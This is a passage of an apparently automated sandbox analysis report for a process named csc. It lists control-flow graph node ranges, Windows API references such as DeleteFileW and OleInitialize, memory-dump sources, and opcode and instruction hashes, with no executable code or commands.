                      • Executed
                      • Not Executed
                      control_flow_graph 422 a660000-a660068 423 a66006f-a660071 422->423 424 a660073-a660079 423->424 425 a660089-a6600bd 423->425 426 a66007d-a66007f 424->426 427 a66007b 424->427 430 a6600c0-a6600c4 425->430 426->425 427->425 431 a6600c6-a6600cb 430->431 432 a6600cd-a6600d2 430->432 433 a6600d8-a6600db 431->433 432->433 434 a660db7-a660dc1 433->434 435 a6600e1-a6600f5 433->435 435->430 437 a6600f7 435->437 438 a660484-a660493 437->438 439 a6603a2-a6603b1 437->439 440 a6602c0-a6602cf 437->440 441 a6600fe-a66010b 437->441 442 a6601de-a6601ed 437->442 443 a660d3f-a660d63 438->443 444 a660499-a6604bf 438->444 439->443 445 a6603b7-a6603dd 439->445 440->443 446 a6602d5-a6602fb 440->446 441->443 448 a660111-a660137 441->448 442->443 447 a6601f3-a660219 442->447 458 a660f32-a660f37 443->458 459 a660d69-a660d70 443->459 477 a6604c1-a6604c6 444->477 478 a6604c8-a6604cf 444->478 479 a6603e6-a6603ed 445->479 480 a6603df-a6603e4 445->480 470 a660304-a66030b 446->470 471 a6602fd-a660302 446->471 472 a660222-a660229 447->472 473 a66021b-a660220 447->473 474 a660140-a660147 448->474 475 a660139-a66013e 448->475 459->458 463 a660d76-a660d91 459->463 463->458 493 a660d97-a660d9f 463->493 485 a660331-a660355 470->485 486 a66030d-a66032f 470->486 484 a660370-a66039d 471->484 488 a66024f-a660273 472->488 489 a66022b-a66024d 472->489 487 a66028e-a6602bb 473->487 491 a66016d-a660191 474->491 492 a660149-a66016b 474->492 490 a6601ac-a6601d9 475->490 494 a660534-a660561 477->494 495 a6604f5-a660519 478->495 496 a6604d1-a6604f3 478->496 482 a660413-a660437 479->482 483 a6603ef-a660411 479->483 481 a660452-a66047f 480->481 481->430 532 a66044f 482->532 533 a660439-a66043f 482->533 483->481 484->430 534 a660357-a66035d 485->534 535 a66036d 485->535 486->484 487->430 536 a660275-a66027b 488->536 537 a66028b 488->537 489->487 490->430 528 a660193-a660199 491->528 529 a6601a9 491->529 492->490 493->458 497 a660da5-a660dae 493->497 494->430 530 a660531 495->530 531 a66051b-a660521 495->531 496->494 497->434 540 a66019d-a66019f 528->540 541 a66019b 528->541 529->490 530->494 542 a660525-a660527 531->542 543 a660523 531->543 532->481 544 a660443-a660445 533->544 545 a660441 533->545 546 a660361-a660363 534->546 547 a66035f 534->547 535->484 538 a66027f-a660281 536->538 539 a66027d 536->539 537->487 538->537 539->537 540->529 541->529 542->530 543->530 544->532 545->532 546->535 547->535
                      Strings
                      Memory Dump Source
                      • Source File: 00000009.00000002.2974018869.000000000A660000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A660000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_a660000_csc.jbxd
                      Similarity
                      • API ID:
                      • String ID: ?$$^q$$^q$$^q$$^q$$^q
                      • API String ID: 0-4250046088
                      • Opcode ID: ac4600dcaff718b9910964fb5d6f3324320b4ac45ff30c045ee50a9fc58f3cb3
                      • Instruction ID: 362ea9ee2dd576df48acd05c7cbfe9523dcab0a64ac289120eb0605947034766
                      • Opcode Fuzzy Hash: ac4600dcaff718b9910964fb5d6f3324320b4ac45ff30c045ee50a9fc58f3cb3
                      • Instruction Fuzzy Hash: 4E915030B443058FCB158BA8C850B6EBBB2FF85700F1585AAD002DF3A6DB75DC068B62

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1084 663f928-663fca2 1087 663fca4-663fca7 1084->1087 1088 663fcaa-663fcd5 DeleteFileW 1084->1088 1087->1088 1089 663fcd7-663fcdd 1088->1089 1090 663fcde-663fd06 1088->1090 1089->1090
                      APIs
                      • DeleteFileW.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,0663FC45), ref: 0663FCC8
                      Strings
                      Memory Dump Source
                      • Source File: 00000009.00000002.2970704506.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_6630000_csc.jbxd
                      Similarity
                      • API ID: DeleteFile
                      • String ID: 4'\
                      • API String ID: 4033686569-2513705929
                      • Opcode ID: f19ad4bc577272a28bb9845a07731382d7e97d8036bf6bcfd29470be39a2893d
                      • Instruction ID: 0336bcd53038170386e263cdcf593d13ff54fad00fb7db9e1515ecbcbbd64667
                      • Opcode Fuzzy Hash: f19ad4bc577272a28bb9845a07731382d7e97d8036bf6bcfd29470be39a2893d
                      • Instruction Fuzzy Hash: C62124B1D006699FCB14DF9AC544BAEFBF4FB48320F10812AE818A7350D378A945CFA5
                      APIs
                      • CreateActCtxA.KERNEL32(?), ref: 066333F1
                      Memory Dump Source
                      • Source File: 00000009.00000002.2970704506.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_6630000_csc.jbxd
                      Similarity
                      • API ID: Create
                      • String ID:
                      • API String ID: 2289755597-0
                      • Opcode ID: d6750c201b113678ad00e43c4b23e58a2bf0125a7d38f097f504eacab85760ec
                      • Instruction ID: 4f4aade6d934e5bca9e7f5f3dfb45392effbd7c1847b93e6d70e73a9b122d8a3
                      • Opcode Fuzzy Hash: d6750c201b113678ad00e43c4b23e58a2bf0125a7d38f097f504eacab85760ec
                      • Instruction Fuzzy Hash: 5341F2B0C00269CFDB64CFA9C844B9EFBB5BF45314F20806AD408BB251DB756986CF90
                      APIs
                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 0AE430D1
                      Memory Dump Source
                      • Source File: 00000009.00000002.2974247838.000000000AE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AE40000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_ae40000_csc.jbxd
                      Similarity
                      • API ID: CallProcWindow
                      • String ID:
                      • API String ID: 2714655100-0
                      • Opcode ID: 3436ab9539e04c51eac49690e034c7acce09658e87ce9c8549ec3ff14ebe460b
                      • Instruction ID: 45c320113d3262123982c058607e93912a3a8d711fda3d7acfcd4a06eb3250e4
                      • Opcode Fuzzy Hash: 3436ab9539e04c51eac49690e034c7acce09658e87ce9c8549ec3ff14ebe460b
                      • Instruction Fuzzy Hash: C9413AB5A00209DFCB14CF59C448AAAFBF9FF88314F24C559D519AB321D375A841CFA0
                      APIs
                      • CreateActCtxA.KERNEL32(?), ref: 066333F1
                      Memory Dump Source
                      • Source File: 00000009.00000002.2970704506.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_6630000_csc.jbxd
                      Similarity
                      • API ID: Create
                      • String ID:
                      • API String ID: 2289755597-0
                      • Opcode ID: 07e1429e0626a61d80b5ab21006c75003be7aeebc97d2a09dfaf29b77dd03379
                      • Instruction ID: f4e3af86b54e0c0b23c565ce871509a9e0570f85dca7cca0042265c8d0ef3db3
                      • Opcode Fuzzy Hash: 07e1429e0626a61d80b5ab21006c75003be7aeebc97d2a09dfaf29b77dd03379
                      • Instruction Fuzzy Hash: 0A41E0B0C00659CFDB64CFA9C844B9EBBB5BF48304F2080AAD409BB251DB756986CF90
                      APIs
                      • DeleteFileW.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,0663FC45), ref: 0663FCC8
                      Memory Dump Source
                      • Source File: 00000009.00000002.2970704506.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_6630000_csc.jbxd
                      Similarity
                      • API ID: DeleteFile
                      • String ID:
                      • API String ID: 4033686569-0
                      • Opcode ID: 82f5864d4675015f9c550fd1082aff846403fe8f24b61812ebd66614fb587810
                      • Instruction ID: 6200435231e4bac9a5fac2e810369bf4676df65e2cd3ebc04e44711b99150b86
                      • Opcode Fuzzy Hash: 82f5864d4675015f9c550fd1082aff846403fe8f24b61812ebd66614fb587810
                      • Instruction Fuzzy Hash: E331EFB0C043999FCB11DFA9C95469EFFB0EF49310F04819AD884A7292C738A805CBA1
                      APIs
                      • OleInitialize.OLE32(00000000), ref: 0AE4588D
                      Memory Dump Source
                      • Source File: 00000009.00000002.2974247838.000000000AE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AE40000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_ae40000_csc.jbxd
                      Similarity
                      • API ID: Initialize
                      • String ID:
                      • API String ID: 2538663250-0
                      • Opcode ID: 5ed28cd4aebf68192e1fdabfa6c1714a4b479ae1fc754dc07b576330847f7558
                      • Instruction ID: 83917ebfdd5b387e7f218a208091672c18f2740c45641a22bf0394ebfe9386a3
                      • Opcode Fuzzy Hash: 5ed28cd4aebf68192e1fdabfa6c1714a4b479ae1fc754dc07b576330847f7558
                      • Instruction Fuzzy Hash: E71115B59003488FCB20DF9AD544BDEFBF8EB48324F108469D559A7210D775A944CFA5
                      APIs
                      • OleInitialize.OLE32(00000000), ref: 0AE4588D
                      Memory Dump Source
                      • Source File: 00000009.00000002.2974247838.000000000AE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AE40000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_ae40000_csc.jbxd
                      Similarity
                      • API ID: Initialize
                      • String ID:
                      • API String ID: 2538663250-0
                      • Opcode ID: 16417187d12edb8bb19b9232b44a7420ad29c2181a2bfaa9d4830fb77244f87e
                      • Instruction ID: c25543a068d5d8b33f5580c73dfeb13bbe4d8914666761e52a6ec227fc988287
                      • Opcode Fuzzy Hash: 16417187d12edb8bb19b9232b44a7420ad29c2181a2bfaa9d4830fb77244f87e
                      • Instruction Fuzzy Hash: C11142B0D002488FCB20DFAAD585BDEFFF4EB48324F20842AD559A7250C738A944CFA4
                      Memory Dump Source
                      • Source File: 00000009.00000002.2970226469.00000000064FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 064FD000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_64fd000_csc.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: fe26d79867d2b0b1faa8d6033f17264ef8a557b039aee74ff516a7a56fe9ecdc
                      • Instruction ID: a41bc457843c196461dfd24a9fddc0c22817215b2c19b8cef44d39ec531a5a74
                      • Opcode Fuzzy Hash: fe26d79867d2b0b1faa8d6033f17264ef8a557b039aee74ff516a7a56fe9ecdc
                      • Instruction Fuzzy Hash: B9212571910204DFDB45DF14D9C4B27BFA5FF88318F20856AEA094B356C336D456CAA2
                      Memory Dump Source
                      • Source File: 00000009.00000002.2970226469.00000000064FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 064FD000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_64fd000_csc.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d7dd706694cb08c14d9b32d0465cd7db7dd589c8cb02eb490dc4abe586b5c179
                      • Instruction ID: 2000ddc7541083b3165b55b4bcf9780de71c88d45940d68bbbe1e01fa69f5849
                      • Opcode Fuzzy Hash: d7dd706694cb08c14d9b32d0465cd7db7dd589c8cb02eb490dc4abe586b5c179
                      • Instruction Fuzzy Hash: 82212571910200DFDB45DF14D9C0B27BF65FF98324F20C66AEA090B356C336E456C6A2
                      Memory Dump Source
                      • Source File: 00000009.00000002.2970330278.000000000650D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0650D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_650d000_csc.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 311b7a252277b27df6d5acf71f9b0e12e30b5d214dc7fa4f7d9810ee14026160
                      • Instruction ID: 06686d2d493f1c00f70c7749d25394e0a00d86b03b7d7256bf9edee7ad0c15f0
                      • Opcode Fuzzy Hash: 311b7a252277b27df6d5acf71f9b0e12e30b5d214dc7fa4f7d9810ee14026160
                      • Instruction Fuzzy Hash: D2213471A00205DFEB40DF94D9C4B26BBB5FF84314F20CA6DE8094B296C37AD446CAA1
                      Memory Dump Source
                      • Source File: 00000009.00000002.2970226469.00000000064FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 064FD000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_64fd000_csc.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                      • Instruction ID: 7aaf183effff92fb62f0714472758320810008c5a52d3ee3b9704032d25a8de0
                      • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                      • Instruction Fuzzy Hash: 8F11AF76914240CFCB16CF14D5C4B16BF71FF94318F24C6AAD9090B256C33AD45ACBA2
                      Memory Dump Source
                      • Source File: 00000009.00000002.2970226469.00000000064FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 064FD000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_64fd000_csc.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                      • Instruction ID: f7f4864e01730ffd48af126f3704f3dccd68f4b20e45141eaa088984c829dae1
                      • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                      • Instruction Fuzzy Hash: 2211AF76904240DFDB06CF10D9C4B16BF62FF94324F24C6AAD9090B656C33AE45ACBA2
                      Memory Dump Source
                      • Source File: 00000009.00000002.2970330278.000000000650D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0650D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_650d000_csc.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                      • Instruction ID: 650084288a884c1460228dbc351192138d931a19482579b62a3734961da46059
                      • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                      • Instruction Fuzzy Hash: 2011A976904284CFDB02CF54D984B15BBB1FB84324F28C6AAD8094B296C33AD44ACF61